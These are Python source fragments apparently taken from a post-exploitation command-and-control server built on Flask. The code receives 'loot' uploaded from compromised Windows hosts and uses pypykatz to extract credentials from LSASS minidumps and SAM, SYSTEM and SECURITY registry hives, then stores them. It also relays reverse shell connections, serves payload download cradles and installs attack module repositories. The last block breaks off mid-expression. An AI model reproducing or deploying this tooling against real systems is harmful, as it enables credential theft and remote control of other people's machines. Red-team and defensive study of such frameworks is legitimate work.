def process_file(file, loot_id, is_from_script, remote_addr): """Save the file or the loot and return a message for push notification""" if loot_id: log.info("Loot received - %s" % loot_id) try: save_loot(file, loot_id, encrypted=is_from_script) decrypt_hive(loot_id) msg = { 'title': "Loot received!", 'body': "%s from %s has been stored." % ( file.filename, remote_addr, ), 'category': "success", } except Exception as e: msg = { 'title': "Error while processing loot", 'body': str(e), 'category': "danger", } log.exception(e) else: log.info("File received - %s" % file.filename) save_file(file, encrypted=is_from_script) msg = {} return msg
def decrypt_hive(loot_id): """Decrypt the registry hive and store result in DB""" loot = get_loot_entry(loot_id) try: from pypykatz.registry.offline_parser import OffineRegistry o = OffineRegistry() try: o = o.from_files( loot.system_file, security_path=loot.security_file, sam_path=loot.sam_file, software_path=loot.software_file, ) except TypeError: # 'system' is not here yet, no biggie return None loot.hive = o.to_json() _db.session.commit() log.debug("Hive decrypted - %s" % loot_id) except ImportError as e: log.error("You have unmet dependencies, loot could not be processed") log.exception(e)
def run(self): while self.active: r, w, _ = select.select(self.read_socks, self.write_socks, [], 5) for s in r: if s == self.signal_pipe[0]: # this was only a signal to interrupt the select block, # do nothing os.read(s, 1024) else: try: if not self.read_shell_packet(s): if s == self.lsock: self.unset_lsock() break elif s == self.rsock: log.info("Connection to reverse shell lost") self.unset_lsock() break except ConnectionResetError: return None except Exception: log.exception( "Exception caught while reading shell packets") break try: if not w: self.ping(self.rsock) for s in w: for p in self.queue[s]: self.write_shell_packet(p, s) self.queue[s] = [] self.write_socks.remove(s) except Exception: log.exception("Exception caught while writing shell packets") break
def parse_sysinfo(sysinfo): if not sysinfo: return {} try: return json.loads(sysinfo) except Exception as e: log.error("Error while parsing sysinfo") log.exception(e) return {}
def init_db(self): try: from flask_sqlalchemy import SQLAlchemy from powerhub.sql import init_db db = SQLAlchemy(self.flask_app) init_db(db) except ImportError as e: log.error("You have unmet dependencies, " "database will not be available") log.exception(e) db = None self.db = db
def get_repo(): """Download a specified repository""" try: install_repo(request.form['repo'], request.form['custom-repo']) msg = { 'title': "Success", 'body': "%s has been installed" % request.form['repo'], 'category': 'success', } except Exception as e: log.exception(e) msg = { 'title': "Error", 'body': str(e), 'category': 'danger', } flash(msg, '') return redirect('/hub')
def reload_modules(): """Reload all modules from disk""" try: global modules modules = import_modules() msg = { 'title': "Success", 'body': "Modules reloaded (press F5 to see them)", 'category': 'success', } except Exception as e: msg = { 'title': "An error occured", 'body': str(e), 'category': 'danger', } log.exception(e) flash(msg) return ('OK', 200)
def save_loot(file, loot_id, encrypted=False): """Process the loot file""" filename = save_file(file, dir=LOOT_DIR, encrypted=encrypted) loot_type = get_loot_type(filename) try: if loot_type == "DMP": from pypykatz.pypykatz import pypykatz mimi = pypykatz.parse_minidump_file(filename) creds = [ json.loads(v.to_json()) for _, v in mimi.logon_sessions.items() ] store_minidump(loot_id, json.dumps(creds), filename) elif loot_type == "SYSINFO": add_sysinfo(loot_id, filename) else: # registry hive add_hive(loot_id, loot_type, filename) except ImportError as e: log.error("You have unmet dependencies, loot could not be processed") log.exception(e)
def download_cradle(): """Download payload as a file cradle""" try: filename, binary = create_payload(request.args) response = make_response(binary) response.headers.set('Content-Type', 'application/octet-stream') response.headers.set( 'Content-Disposition', 'attachment', filename=filename, ) return response except Exception as e: msg = { 'title': 'An error occurred', 'body': str(e), 'category': 'danger', } flash(msg) log.exception(e) return redirect('/hub')
app = Flask(__name__) app.wsgi_app = ProxyFix(app.wsgi_app, x_proto=1, x_host=1, x_port=1) app.config.update( DEBUG=args.DEBUG, SECRET_KEY=os.urandom(16), SQLALCHEMY_DATABASE_URI='sqlite:///' + DB_FILENAME, SQLALCHEMY_TRACK_MODIFICATIONS=False, ) try: from flask_sqlalchemy import SQLAlchemy db = SQLAlchemy(app) init_db(db) except ImportError as e: log.error("You have unmet dependencies, database will not be available") log.exception(e) db = None cb = get_clipboard() socketio = SocketIO( app, async_mode="threading", cors_allowed_origins=[ "http://%s:%d" % ( args.URI_HOST, args.LPORT, ), "https://%s:%d" % ( args.URI_HOST, args.SSL_PORT, ),